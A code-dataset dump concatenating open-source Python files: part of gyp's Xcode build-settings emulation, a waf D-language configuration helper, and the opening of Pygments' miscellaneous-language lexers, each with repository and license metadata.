sdk_root, 'ProductBuildVersion') else: cache['DTSDKBuild'] = cache['BuildMachineOSBuild'] if self.isIOS: cache['DTPlatformName'] = cache['DTSDKName'] if configname.endswith("iphoneos"): cache['DTPlatformVersion'] = self._GetSdkVersionInfoItem( sdk_root, 'ProductVersion') cache['CFBundleSupportedPlatforms'] = ['iPhoneOS'] else: cache['CFBundleSupportedPlatforms'] = ['iPhoneSimulator'] XcodeSettings._plist_cache[configname] = cache # Include extra plist items that are per-target, not per global # XcodeSettings. items = dict(XcodeSettings._plist_cache[configname]) if self.isIOS: items['UIDeviceFamily'] = self._XcodeIOSDeviceFamily(configname) return items def _DefaultSdkRoot(self): """Returns the default SDKROOT to use. Prior to version 5.0.0, if SDKROOT was not explicitly set in the Xcode project, then the environment variable was empty. Starting with this version, Xcode uses the name of the newest SDK installed. """ xcode_version, xcode_build = XcodeVersion() if xcode_version < '0500': return '' default_sdk_path = self._XcodeSdkPath('') default_sdk_root = XcodeSettings._sdk_root_cache.get(default_sdk_path) if default_sdk_root: return default_sdk_root try: all_sdks = GetStdout(['xcodebuild', '-showsdks']) except: # If xcodebuild fails, there will be no valid SDKs return '' for line in all_sdks.splitlines(): items = line.split() if len(items) >= 3 and items[-2] == '-sdk': sdk_root = items[-1] sdk_path = self._XcodeSdkPath(sdk_root) if sdk_path == default_sdk_path: return sdk_root return '' class MacPrefixHeader(object): """A class that helps with emulating Xcode's GCC_PREFIX_HEADER feature. This feature consists of several pieces: * If GCC_PREFIX_HEADER is present, all compilations in that project get an additional |-include path_to_prefix_header| cflag. * If GCC_PRECOMPILE_PREFIX_HEADER is present too, then the prefix header is instead compiled, and all other compilations in the project get an additional |-include path_to_compiled_header| instead. + Compiled prefix headers have the extension gch. There is one gch file for every language used in the project (c, cc, m, mm), since gch files for different languages aren't compatible. + gch files themselves are built with the target's normal cflags, but they obviously don't get the |-include| flag. Instead, they need a -x flag that describes their language. + All o files in the target need to depend on the gch file, to make sure it's built before any o file is built. This class helps with some of these tasks, but it needs help from the build system for writing dependencies to the gch files, for writing build commands for the gch files, and for figuring out the location of the gch files. """ def __init__(self, xcode_settings, gyp_path_to_build_path, gyp_path_to_build_output): """If xcode_settings is None, all methods on this class are no-ops. Args: gyp_path_to_build_path: A function that takes a gyp-relative path, and returns a path relative to the build directory. gyp_path_to_build_output: A function that takes a gyp-relative path and a language code ('c', 'cc', 'm', or 'mm'), and that returns a path to where the output of precompiling that path for that language should be placed (without the trailing '.gch'). """ # This doesn't support per-configuration prefix headers. Good enough # for now. self.header = None self.compile_headers = False if xcode_settings: self.header = xcode_settings.GetPerTargetSetting('GCC_PREFIX_HEADER') self.compile_headers = xcode_settings.GetPerTargetSetting( 'GCC_PRECOMPILE_PREFIX_HEADER', default='NO') != 'NO' self.compiled_headers = {} if self.header: if self.compile_headers: for lang in ['c', 'cc', 'm', 'mm']: self.compiled_headers[lang] = gyp_path_to_build_output( self.header, lang) self.header = gyp_path_to_build_path(self.header) def _CompiledHeader(self, lang, arch): assert self.compile_headers h = self.compiled_headers[lang] if arch: h += '.' + arch return h def GetInclude(self, lang, arch=None): """Gets the cflags to include the prefix header for language |lang|.""" if self.compile_headers and lang in self.compiled_headers: return '-include %s' % self._CompiledHeader(lang, arch) elif self.header: return '-include %s' % self.header else: return '' def _Gch(self, lang, arch): """Returns the actual file name of the prefix header for language |lang|.""" assert self.compile_headers return self._CompiledHeader(lang, arch) + '.gch' def GetObjDependencies(self, sources, objs, arch=None): """Given a list of source files and the corresponding object files, returns a list of (source, object, gch) tuples, where |gch| is the build-directory relative path to the gch file each object file depends on. |compilable[i]| has to be the source file belonging to |objs[i]|.""" if not self.header or not self.compile_headers: return [] result = [] for source, obj in zip(sources, objs): ext = os.path.splitext(source)[1] lang = { '.c': 'c', '.cpp': 'cc', '.cc': 'cc', '.cxx': 'cc', '.m': 'm', '.mm': 'mm', }.get(ext, None) if lang: result.append((source, obj, self._Gch(lang, arch))) return result def GetPchBuildCommands(self, arch=None): """Returns [(path_to_gch, language_flag, language, header)]. |path_to_gch| and |header| are relative to the build directory. """ if not self.header or not self.compile_headers: return [] return [ (self._Gch('c', arch), '-x c-header', 'c', self.header), (self._Gch('cc', arch), '-x c++-header', 'cc', self.header), (self._Gch('m', arch), '-x objective-c-header', 'm', self.header), (self._Gch('mm', arch), '-x objective-c++-header', 'mm', self.header), ] def XcodeVersion(): """Returns a tuple of version and build version of installed Xcode.""" # `xcodebuild -version` output looks like # Xcode 4.6.3 # Build version 4H1503 # or like # Xcode 3.2.6 # Component versions: DevToolsCore-1809.0; DevToolsSupport-1806.0 # BuildVersion: 10M2518 # Convert that to '0463', '4H1503'. global XCODE_VERSION_CACHE if XCODE_VERSION_CACHE: return XCODE_VERSION_CACHE try: version_list = GetStdout(['xcodebuild', '-version']).splitlines() # In some circumstances xcodebuild exits 0 but doesn't return # the right results; for example, a user on 10.7 or 10.8 with # a bogus path set via xcode-select # In that case this may be a CLT-only install so fall back to # checking that version. if len(version_list) < 2: raise GypError("xcodebuild returned unexpected results") except: version = CLTVersion() if version: version = re.match(r'(\d\.\d\.?\d*)', version).groups()[0] else: raise GypError("No Xcode or CLT version detected!") # The CLT has no build information, so we return an empty string. version_list = [version, ''] version = version_list[0] build = version_list[-1] # Be careful to convert "4.2" to "0420": version = version.split()[-1].replace('.', '') version = (version + '0' * (3 - len(version))).zfill(4) if build: build = build.split()[-1] XCODE_VERSION_CACHE = (version, build) return XCODE_VERSION_CACHE # This function ported from the logic in Homebrew's CLT version check def CLTVersion(): """Returns the version of command-line tools from pkgutil.""" # pkgutil output looks like # package-id: com.apple.pkg.CLTools_Executables # version: 5.0.1.0.1.1382131676 # volume: / # location: / # install-time: 1382544035 # groups: com.apple.FindSystemFiles.pkg-group com.apple.DevToolsBoth.pkg-group com.apple.DevToolsNonRelocatableShared.pkg-group STANDALONE_PKG_ID = "com.apple.pkg.DeveloperToolsCLILeo" FROM_XCODE_PKG_ID = "com.apple.pkg.DeveloperToolsCLI" MAVERICKS_PKG_ID = "com.apple.pkg.CLTools_Executables" regex = re.compile('version: (?P<version>.+)') for key in [MAVERICKS_PKG_ID, STANDALONE_PKG_ID, FROM_XCODE_PKG_ID]: try: output = GetStdout(['/usr/sbin/pkgutil', '--pkg-info', key]) return re.search(regex, output).groupdict()['version'] except: continue def GetStdout(cmdlist): """Returns the content of standard output returned by invoking |cmdlist|. Raises |GypError| if the command return with a non-zero return code.""" job = subprocess.Popen(cmdlist, stdout=subprocess.PIPE) out = job.communicate()[0] if job.returncode != 0: sys.stderr.write(out + '\n') raise GypError('Error %d running %s' % (job.returncode, cmdlist[0])) return out.rstrip('\n') def MergeGlobalXcodeSettingsToSpec(global_dict, spec): """Merges the global xcode_settings dictionary into each configuration of the target represented by spec. For keys that are both in the global and the local xcode_settings dict, the local key gets precendence. """ # The xcode generator special-cases global xcode_settings and does something # that amounts to merging in the global xcode_settings into each local # xcode_settings dict. global_xcode_settings = global_dict.get('xcode_settings', {}) for config in spec['configurations'].values(): if 'xcode_settings' in config: new_settings = global_xcode_settings.copy() new_settings.update(config['xcode_settings']) config['xcode_settings'] = new_settings def IsMacBundle(flavor, spec): """Returns if |spec| should be treated as a bundle. Bundles are directories with a certain subdirectory structure, instead of just a single file. Bundle rules do not produce a binary but also package resources into that directory.""" is_mac_bundle = (int(spec.get('mac_bundle', 0)) != 0 and flavor == 'mac') if is_mac_bundle: assert spec['type'] != 'none', ( 'mac_bundle targets cannot have type none (target "%s")' % spec['target_name']) return is_mac_bundle def GetMacBundleResources(product_dir, xcode_settings, resources): """Yields (output, resource) pairs for every resource in |resources|. Only call this for mac bundle targets. Args: product_dir: Path to the directory containing the output bundle, relative to the build directory. xcode_settings: The XcodeSettings of the current target. resources: A list of bundle resources, relative to the build directory. """ dest = os.path.join(product_dir, xcode_settings.GetBundleResourceFolder()) for res in resources: output = dest # The make generator doesn't support it, so forbid it everywhere # to keep the generators more interchangable. assert ' ' not in res, ( "Spaces in resource filenames not supported (%s)" % res) # Split into (path,file). res_parts = os.path.split(res) # Now split the path into (prefix,maybe.lproj). lproj_parts = os.path.split(res_parts[0]) # If the resource lives in a .lproj bundle, add that to the destination. if lproj_parts[1].endswith('.lproj'): output = os.path.join(output, lproj_parts[1]) output = os.path.join(output, res_parts[1]) # Compiled XIB files are referred to by .nib. if output.endswith('.xib'): output = os.path.splitext(output)[0] + '.nib' # Compiled storyboard files are referred to by .storyboardc. if output.endswith('.storyboard'): output = os.path.splitext(output)[0] + '.storyboardc' yield output, res def GetMacInfoPlist(product_dir, xcode_settings, gyp_path_to_build_path): """Returns (info_plist, dest_plist, defines, extra_env), where: * |info_plist| is the source plist path, relative to the build directory, * |dest_plist| is the destination plist path, relative to the build directory, * |defines| is a list of preprocessor defines (empty if the plist shouldn't be preprocessed, * |extra_env| is a dict of env variables that should be exported when invoking |mac_tool copy-info-plist|. Only call this for mac bundle targets. Args: product_dir: Path to the directory containing the output bundle, relative to the build directory. xcode_settings: The XcodeSettings of the current target. gyp_to_build_path: A function that converts paths relative to the current gyp file to paths relative to the build direcotry. """ info_plist = xcode_settings.GetPerTargetSetting('INFOPLIST_FILE') if not info_plist: return None, None, [], {} # The make generator doesn't support it, so forbid it everywhere # to keep the generators more interchangable. assert ' ' not in info_plist, ( "Spaces in Info.plist filenames not supported (%s)" % info_plist) info_plist = gyp_path_to_build_path(info_plist) # If explicitly set to preprocess the plist, invoke the C preprocessor and # specify any defines as -D flags. if xcode_settings.GetPerTargetSetting( 'INFOPLIST_PREPROCESS', default='NO') == 'YES': # Create an intermediate file based on the path. defines = shlex.split(xcode_settings.GetPerTargetSetting( 'INFOPLIST_PREPROCESSOR_DEFINITIONS', default='')) else: defines = [] dest_plist = os.path.join(product_dir, xcode_settings.GetBundlePlistPath()) extra_env = xcode_settings.GetPerTargetSettings() return info_plist, dest_plist, defines, extra_env def _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration, additional_settings=None): """Return the environment variables that Xcode would set. See http://developer.apple.com/library/mac/#documentation/DeveloperTools/Reference/XcodeBuildSettingRef/1-Build_Setting_Reference/build_setting_ref.html#//apple_ref/doc/uid/TP40003931-CH3-SW153 for a full list. Args: xcode_settings: An XcodeSettings object. If this is None, this function returns an empty dict. built_products_dir: Absolute path to the built products dir. srcroot: Absolute path to the source root. configuration: The build configuration name. additional_settings: An optional dict with more values to add to the result. """ if not xcode_settings: return {} # This function is considered a friend of XcodeSettings, so let it reach into # its implementation details. spec = xcode_settings.spec # These are filled in on a as-needed basis. env = { 'BUILT_FRAMEWORKS_DIR' : built_products_dir, 'BUILT_PRODUCTS_DIR' : built_products_dir, 'CONFIGURATION' : configuration, 'PRODUCT_NAME' : xcode_settings.GetProductName(), # See /Developer/Platforms/MacOSX.platform/Developer/Library/Xcode/Specifications/MacOSX\ Product\ Types.xcspec for FULL_PRODUCT_NAME 'SRCROOT' : srcroot, 'SOURCE_ROOT': '${SRCROOT}', # This is not true for static libraries, but currently the env is only # written for bundles: 'TARGET_BUILD_DIR' : built_products_dir, 'TEMP_DIR' : '${TMPDIR}', } if xcode_settings.GetPerConfigSetting('SDKROOT', configuration): env['SDKROOT'] = xcode_settings._SdkPath(configuration) else: env['SDKROOT'] = '' if spec['type'] in ( 'executable', 'static_library', 'shared_library', 'loadable_module'): env['EXECUTABLE_NAME'] = xcode_settings.GetExecutableName() env['EXECUTABLE_PATH'] = xcode_settings.GetExecutablePath() env['FULL_PRODUCT_NAME'] = xcode_settings.GetFullProductName() mach_o_type = xcode_settings.GetMachOType() if mach_o_type: env['MACH_O_TYPE'] = mach_o_type env['PRODUCT_TYPE'] = xcode_settings.GetProductType() if xcode_settings._IsBundle(): env['CONTENTS_FOLDER_PATH'] = \ xcode_settings.GetBundleContentsFolderPath() env['UNLOCALIZED_RESOURCES_FOLDER_PATH'] = \ xcode_settings.GetBundleResourceFolder() env['INFOPLIST_PATH'] = xcode_settings.GetBundlePlistPath() env['WRAPPER_NAME'] = xcode_settings.GetWrapperName() install_name = xcode_settings.GetInstallName() if install_name: env['LD_DYLIB_INSTALL_NAME'] = install_name install_name_base = xcode_settings.GetInstallNameBase() if install_name_base: env['DYLIB_INSTALL_NAME_BASE'] = install_name_base if XcodeVersion() >= '0500' and not env.get('SDKROOT'): sdk_root = xcode_settings._SdkRoot(configuration) if not sdk_root: sdk_root = xcode_settings._XcodeSdkPath('') if sdk_root is None: sdk_root = '' env['SDKROOT'] = sdk_root if not additional_settings: additional_settings = {} else: # Flatten lists to strings. for k in additional_settings: if not isinstance(additional_settings[k], str): additional_settings[k] = ' '.join(additional_settings[k]) additional_settings.update(env) for k in additional_settings: additional_settings[k] = _NormalizeEnvVarReferences(additional_settings[k]) return additional_settings def _NormalizeEnvVarReferences(str): """Takes a string containing variable references in the form ${FOO}, $(FOO), or $FOO, and returns a string with all variable references in the form ${FOO}. """ # $FOO -> ${FOO} str = re.sub(r'\$([a-zA-Z_][a-zA-Z0-9_]*)', r'${\1}', str) # $(FOO) -> ${FOO} matches = re.findall(r'(\$\(([a-zA-Z0-9\-_]+)\))', str) for match in matches: to_replace, variable = match assert '$(' not in match, '$($(FOO)) variables not supported: ' + match str = str.replace(to_replace, '${' + variable + '}') return str def ExpandEnvVars(string, expansions): """Expands ${VARIABLES}, $(VARIABLES), and $VARIABLES in string per the expansions list. If the variable expands to something that references another variable, this variable is expanded as well if it's in env -- until no variables present in env are left.""" for k, v in reversed(expansions): string = string.replace('${' + k + '}', v) string = string.replace('$(' + k + ')', v) string = string.replace('$' + k, v) return string def _TopologicallySortedEnvVarKeys(env): """Takes a dict |env| whose values are strings that can refer to other keys, for example env['foo'] = '$(bar) and $(baz)'. Returns a list L of all keys of env such that key2 is after key1 in L if env[key2] refers to env[key1]. Throws an Exception in case of dependency cycles. """ # Since environment variables can refer to other variables, the evaluation # order is important. Below is the logic to compute the dependency graph # and sort it. regex = re.compile(r'\$\{([a-zA-Z0-9\-_]+)\}') def GetEdges(node): # Use a definition of edges such that user_of_variable -> used_varible. # This happens to be easier in this case, since a variable's # definition contains all variables it references in a single string. # We can then reverse the result of the topological sort at the end. # Since: reverse(topsort(DAG)) = topsort(reverse_edges(DAG)) matches = set([v for v in regex.findall(env[node]) if v in env]) for dependee in matches: assert '${' not in dependee, 'Nested variables not supported: ' + dependee return matches try: # Topologically sort, and then reverse, because we used an edge definition # that's inverted from the expected result of this function (see comment # above). order = gyp.common.TopologicallySorted(env.keys(), GetEdges) order.reverse() return order except gyp.common.CycleError, e: raise GypError( 'Xcode environment variables are cyclically dependent: ' + str(e.nodes)) def GetSortedXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration, additional_settings=None): env = _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration, additional_settings) return [(key, env[key]) for key in _TopologicallySortedEnvVarKeys(env)] def GetSpecPostbuildCommands(spec, quiet=False): """Returns the list of postbuilds explicitly defined on |spec|, in a form executable by a shell.""" postbuilds = [] for postbuild in spec.get('postbuilds', []): if not quiet: postbuilds.append('echo POSTBUILD\\(%s\\) %s' % ( spec['target_name'], postbuild['postbuild_name'])) postbuilds.append(gyp.common.EncodePOSIXShellList(postbuild['action'])) return postbuilds def _HasIOSTarget(targets): """Returns true if any target contains the iOS specific key IPHONEOS_DEPLOYMENT_TARGET.""" for target_dict in targets.values(): for config in target_dict['configurations'].values(): if config.get('xcode_settings', {}).get('IPHONEOS_DEPLOYMENT_TARGET'): return True return False def _AddIOSDeviceConfigurations(targets): """Clone all targets and append -iphoneos to the name. Configure these targets to build for iOS devices and use correct architectures for those builds.""" for target_dict in targets.itervalues(): toolset = target_dict['toolset'] configs = target_dict['configurations'] for config_name, config_dict in dict(configs).iteritems(): iphoneos_config_dict = copy.deepcopy(config_dict) configs[config_name + '-iphoneos'] = iphoneos_config_dict configs[config_name + '-iphonesimulator'] = config_dict if toolset == 'target': iphoneos_config_dict['xcode_settings']['SDKROOT'] = 'iphoneos' return targets def CloneConfigurationForDeviceAndEmulator(target_dicts): """If |target_dicts| contains any iOS targets, automatically create -iphoneos targets for iOS device builds.""" if _HasIOSTarget(target_dicts): return _AddIOSDeviceConfigurations(target_dicts) return target_dicts
apache-2.0
gcode-mirror/audacity
lib-src/lv2/lv2/plugins/eg01-amp.lv2/waflib/Tools/d_config.py
316
1208
#! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file from waflib import Utils from waflib.Configure import conf @conf def d_platform_flags(self): v=self.env if not v.DEST_OS: v.DEST_OS=Utils.unversioned_sys_platform() binfmt=Utils.destos_to_binfmt(self.env.DEST_OS) if binfmt=='pe': v['dprogram_PATTERN']='%s.exe' v['dshlib_PATTERN']='lib%s.dll' v['dstlib_PATTERN']='lib%s.a' elif binfmt=='mac-o': v['dprogram_PATTERN']='%s' v['dshlib_PATTERN']='lib%s.dylib' v['dstlib_PATTERN']='lib%s.a' else: v['dprogram_PATTERN']='%s' v['dshlib_PATTERN']='lib%s.so' v['dstlib_PATTERN']='lib%s.a' DLIB=''' version(D_Version2) { import std.stdio; int main() { writefln("phobos2"); return 0; } } else { version(Tango) { import tango.stdc.stdio; int main() { printf("tango"); return 0; } } else { import std.stdio; int main() { writefln("phobos1"); return 0; } } } ''' @conf def check_dlibrary(self,execute=True): ret=self.check_cc(features='d dprogram',fragment=DLIB,compile_filename='test.d',execute=execute,define_ret=True) if execute: self.env.DLIBRARY=ret.strip()
gpl-2.0
nhtera/github.io
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/lexers/other.py
94
170941
# -*- coding: utf-8 -*- """ pygments.lexers.other ~~~~~~~~~~~~~~~~~~~~~ Lexers for other languages. :copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. """ import re from pygments.lexer import RegexLexer, include, bygroups, using, \ this, combined, ExtendedRegexLexer from pygments.token import Error, Punctuation, Literal, Token, \ Text, Comment, Operator, Keyword, Name, String, Number, Generic, \ Whitespace from pygments.util import get_bool_opt from pygments.lexers.web import HtmlLexer from pygments.lexers._openedgebuiltins import OPENEDGEKEYWORDS from pygments.lexers._robotframeworklexer import RobotFrameworkLexer # backwards compatibility from pygments.lexers.sql import SqlLexer, MySqlLexer, SqliteConsoleLexer from pygments.lexers.shell import BashLexer, BashSessionLexer, BatchLexer, \ TcshLexer __all__ = ['BrainfuckLexer', 'BefungeLexer', 'RedcodeLexer', 'MOOCodeLexer', 'SmalltalkLexer', 'LogtalkLexer', 'GnuplotLexer', 'PovrayLexer', 'AppleScriptLexer', 'ModelicaLexer', 'RebolLexer', 'ABAPLexer', 'NewspeakLexer', 'GherkinLexer', 'AsymptoteLexer', 'PostScriptLexer', 'AutohotkeyLexer', 'GoodDataCLLexer', 'MaqlLexer', 'ProtoBufLexer', 'HybrisLexer', 'AwkLexer', 'Cfengine3Lexer', 'SnobolLexer', 'ECLLexer', 'UrbiscriptLexer', 'OpenEdgeLexer', 'BroLexer', 'MscgenLexer', 'KconfigLexer', 'VGLLexer', 'SourcePawnLexer', 'RobotFrameworkLexer', 'PuppetLexer', 'NSISLexer', 'RPMSpecLexer', 'CbmBasicV2Lexer', 'AutoItLexer', 'RexxLexer'] class ECLLexer(RegexLexer): """ Lexer for the declarative big-data `ECL <http://hpccsystems.com/community/docs/ecl-language-reference/html>`_ language. *New in Pygments 1.5.* """ name = 'ECL' aliases = ['ecl'] filenames = ['*.ecl'] mimetypes = ['application/x-ecl'] flags = re.IGNORECASE | re.MULTILINE tokens = { 'root': [ include('whitespace'), include('statements'), ], 'whitespace': [ (r'\s+', Text), (r'\/\/.*', Comment.Single), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline), ], 'statements': [ include('types'), include('keywords'), include('functions'), include('hash'), (r'"', String, 'string'), (r'\'', String, 'string'), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float), (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex), (r'0[0-7]+[LlUu]*', Number.Oct), (r'\d+[LlUu]*', Number.Integer), (r'\*/', Error), (r'[~!%^&*+=|?:<>/-]+', Operator), (r'[{}()\[\],.;]', Punctuation), (r'[a-zA-Z_][a-zA-Z0-9_]*', Name), ], 'hash': [ (r'^#.*$', Comment.Preproc), ], 'types': [ (r'(RECORD|END)\D', Keyword.Declaration), (r'((?:ASCII|BIG_ENDIAN|BOOLEAN|DATA|DECIMAL|EBCDIC|INTEGER|PATTERN|' r'QSTRING|REAL|RECORD|RULE|SET OF|STRING|TOKEN|UDECIMAL|UNICODE|' r'UNSIGNED|VARSTRING|VARUNICODE)\d*)(\s+)', bygroups(Keyword.Type, Text)), ], 'keywords': [ (r'(APPLY|ASSERT|BUILD|BUILDINDEX|EVALUATE|FAIL|KEYDIFF|KEYPATCH|' r'LOADXML|NOTHOR|NOTIFY|OUTPUT|PARALLEL|SEQUENTIAL|SOAPCALL|WAIT' r'CHECKPOINT|DEPRECATED|FAILCODE|FAILMESSAGE|FAILURE|GLOBAL|' r'INDEPENDENT|ONWARNING|PERSIST|PRIORITY|RECOVERY|STORED|SUCCESS|' r'WAIT|WHEN)\b', Keyword.Reserved), # These are classed differently, check later (r'(ALL|AND|ANY|AS|ATMOST|BEFORE|BEGINC\+\+|BEST|BETWEEN|CASE|CONST|' r'COUNTER|CSV|DESCEND|ENCRYPT|ENDC\+\+|ENDMACRO|EXCEPT|EXCLUSIVE|' r'EXPIRE|EXPORT|EXTEND|FALSE|FEW|FIRST|FLAT|FULL|FUNCTION|GROUP|' r'HEADER|HEADING|HOLE|IFBLOCK|IMPORT|IN|JOINED|KEEP|KEYED|LAST|' r'LEFT|LIMIT|LOAD|LOCAL|LOCALE|LOOKUP|MACRO|MANY|MAXCOUNT|' r'MAXLENGTH|MIN SKEW|MODULE|INTERFACE|NAMED|NOCASE|NOROOT|NOSCAN|' r'NOSORT|NOT|OF|ONLY|OPT|OR|OUTER|OVERWRITE|PACKED|PARTITION|' r'PENALTY|PHYSICALLENGTH|PIPE|QUOTE|RELATIONSHIP|REPEAT|RETURN|' r'RIGHT|SCAN|SELF|SEPARATOR|SERVICE|SHARED|SKEW|SKIP|SQL|STORE|' r'TERMINATOR|THOR|THRESHOLD|TOKEN|TRANSFORM|TRIM|TRUE|TYPE|' r'UNICODEORDER|UNSORTED|VALIDATE|VIRTUAL|WHOLE|WILD|WITHIN|XML|' r'XPATH|__COMPRESSED__)\b', Keyword.Reserved), ], 'functions': [ (r'(ABS|ACOS|ALLNODES|ASCII|ASIN|ASSTRING|ATAN|ATAN2|AVE|CASE|' r'CHOOSE|CHOOSEN|CHOOSESETS|CLUSTERSIZE|COMBINE|CORRELATION|COS|' r'COSH|COUNT|COVARIANCE|CRON|DATASET|DEDUP|DEFINE|DENORMALIZE|' r'DISTRIBUTE|DISTRIBUTED|DISTRIBUTION|EBCDIC|ENTH|ERROR|EVALUATE|' r'EVENT|EVENTEXTRA|EVENTNAME|EXISTS|EXP|FAILCODE|FAILMESSAGE|' r'FETCH|FROMUNICODE|GETISVALID|GLOBAL|GRAPH|GROUP|HASH|HASH32|' r'HASH64|HASHCRC|HASHMD5|HAVING|IF|INDEX|INTFORMAT|ISVALID|' r'ITERATE|JOIN|KEYUNICODE|LENGTH|LIBRARY|LIMIT|LN|LOCAL|LOG|LOOP|' r'MAP|MATCHED|MATCHLENGTH|MATCHPOSITION|MATCHTEXT|MATCHUNICODE|' r'MAX|MERGE|MERGEJOIN|MIN|NOLOCAL|NONEMPTY|NORMALIZE|PARSE|PIPE|' r'POWER|PRELOAD|PROCESS|PROJECT|PULL|RANDOM|RANGE|RANK|RANKED|' r'REALFORMAT|RECORDOF|REGEXFIND|REGEXREPLACE|REGROUP|REJECTED|' r'ROLLUP|ROUND|ROUNDUP|ROW|ROWDIFF|SAMPLE|SET|SIN|SINH|SIZEOF|' r'SOAPCALL|SORT|SORTED|SQRT|STEPPED|STORED|SUM|TABLE|TAN|TANH|' r'THISNODE|TOPN|TOUNICODE|TRANSFER|TRIM|TRUNCATE|TYPEOF|UNGROUP|' r'UNICODEORDER|VARIANCE|WHICH|WORKUNIT|XMLDECODE|XMLENCODE|' r'XMLTEXT|XMLUNICODE)\b', Name.Function), ], 'string': [ (r'"', String, '#pop'), (r'\'', String, '#pop'), (r'[^"\']+', String), ], } class BrainfuckLexer(RegexLexer): """ Lexer for the esoteric `BrainFuck <http://www.muppetlabs.com/~breadbox/bf/>`_ language. """ name = 'Brainfuck' aliases = ['brainfuck', 'bf'] filenames = ['*.bf', '*.b'] mimetypes = ['application/x-brainfuck'] tokens = { 'common': [ # use different colors for different instruction types (r'[.,]+', Name.Tag), (r'[+-]+', Name.Builtin), (r'[<>]+', Name.Variable), (r'[^.,+\-<>\[\]]+', Comment), ], 'root': [ (r'\[', Keyword, 'loop'), (r'\]', Error), include('common'), ], 'loop': [ (r'\[', Keyword, '#push'), (r'\]', Keyword, '#pop'), include('common'), ] } class BefungeLexer(RegexLexer): """ Lexer for the esoteric `Befunge <http://en.wikipedia.org/wiki/Befunge>`_ language. *New in Pygments 0.7.* """ name = 'Befunge' aliases = ['befunge'] filenames = ['*.befunge'] mimetypes = ['application/x-befunge'] tokens = { 'root': [ (r'[0-9a-f]', Number), (r'[\+\*/%!`-]', Operator), # Traditional math (r'[<>^v?\[\]rxjk]', Name.Variable), # Move, imperatives (r'[:\\$.,n]', Name.Builtin), # Stack ops, imperatives (r'[|_mw]', Keyword), (r'[{}]', Name.Tag), # Befunge-98 stack ops (r'".*?"', String.Double), # Strings don't appear to allow escapes (r'\'.', String.Single), # Single character (r'[#;]', Comment), # Trampoline... depends on direction hit (r'[pg&~=@iotsy]', Keyword), # Misc (r'[()A-Z]', Comment), # Fingerprints (r'\s+', Text), # Whitespace doesn't matter ], } class RedcodeLexer(RegexLexer): """ A simple Redcode lexer based on ICWS'94. Contributed by Adam Blinkinsop <blinks@acm.org>. *New in Pygments 0.8.* """ name = 'Redcode' aliases = ['redcode'] filenames = ['*.cw'] opcodes = ['DAT','MOV','ADD','SUB','MUL','DIV','MOD', 'JMP','JMZ','JMN','DJN','CMP','SLT','SPL', 'ORG','EQU','END'] modifiers = ['A','B','AB','BA','F','X','I'] tokens = { 'root': [ # Whitespace: (r'\s+', Text), (r';.*$', Comment.Single), # Lexemes: # Identifiers (r'\b(%s)\b' % '|'.join(opcodes), Name.Function), (r'\b(%s)\b' % '|'.join(modifiers), Name.Decorator), (r'[A-Za-z_][A-Za-z_0-9]+', Name), # Operators (r'[-+*/%]', Operator), (r'[#$@<>]', Operator), # mode (r'[.,]', Punctuation), # mode # Numbers (r'[-+]?\d+', Number.Integer), ], } class MOOCodeLexer(RegexLexer): """ For `MOOCode <http://www.moo.mud.org/>`_ (the MOO scripting language). *New in Pygments 0.9.* """ name = 'MOOCode' filenames = ['*.moo'] aliases = ['moocode', 'moo'] mimetypes = ['text/x-moocode'] tokens = { 'root' : [ # Numbers (r'(0|[1-9][0-9_]*)', Number.Integer), # Strings (r'"(\\\\|\\"|[^"])*"', String), # exceptions (r'(E_PERM|E_DIV)', Name.Exception), # db-refs (r'((#[-0-9]+)|(\$[a-z_A-Z0-9]+))', Name.Entity), # Keywords (r'\b(if|else|elseif|endif|for|endfor|fork|endfork|while' r'|endwhile|break|continue|return|try' r'|except|endtry|finally|in)\b', Keyword), # builtins (r'(random|length)', Name.Builtin), # special variables (r'(player|caller|this|args)', Name.Variable.Instance), # skip whitespace (r'\s+', Text), (r'\n', Text), # other operators (r'([!;=,{}&\|:\.\[\]@\(\)\<\>\?]+)', Operator), # function call (r'([a-z_A-Z0-9]+)(\()', bygroups(Name.Function, Operator)), # variables (r'([a-zA-Z_0-9]+)', Text), ] } class SmalltalkLexer(RegexLexer): """ For `Smalltalk <http://www.smalltalk.org/>`_ syntax. Contributed by Stefan Matthias Aust. Rewritten by Nils Winter. *New in Pygments 0.10.* """ name = 'Smalltalk' filenames = ['*.st'] aliases = ['smalltalk', 'squeak', 'st'] mimetypes = ['text/x-smalltalk'] tokens = { 'root' : [ (r'(<)(\w+:)(.*?)(>)', bygroups(Text, Keyword, Text, Text)), include('squeak fileout'), include('whitespaces'), include('method definition'), (r'(\|)([\w\s]*)(\|)', bygroups(Operator, Name.Variable, Operator)), include('objects'), (r'\^|\:=|\_', Operator), # temporaries (r'[\]({}.;!]', Text), ], 'method definition' : [ # Not perfect can't allow whitespaces at the beginning and the # without breaking everything (r'([a-zA-Z]+\w*:)(\s*)(\w+)', bygroups(Name.Function, Text, Name.Variable)), (r'^(\b[a-zA-Z]+\w*\b)(\s*)$', bygroups(Name.Function, Text)), (r'^([-+*/\\~<>=|&!?,@%]+)(\s*)(\w+)(\s*)$', bygroups(Name.Function, Text, Name.Variable, Text)), ], 'blockvariables' : [ include('whitespaces'), (r'(:)(\s*)(\w+)', bygroups(Operator, Text, Name.Variable)), (r'\|', Operator, '#pop'), (r'', Text, '#pop'), # else pop ], 'literals' : [ (r"'(''|[^'])*'", String, 'afterobject'), (r'\$.', String.Char, 'afterobject'), (r'#\(', String.Symbol, 'parenth'), (r'\)', Text, 'afterobject'), (r'(\d+r)?-?\d+(\.\d+)?(e-?\d+)?', Number, 'afterobject'), ], '_parenth_helper' : [ include('whitespaces'), (r'(\d+r)?-?\d+(\.\d+)?(e-?\d+)?', Number), (r'[-+*/\\~<>=|&#!?,@%\w:]+', String.Symbol), # literals (r"'(''|[^'])*'", String), (r'\$.', String.Char), (r'#*\(', String.Symbol, 'inner_parenth'), ], 'parenth' : [ 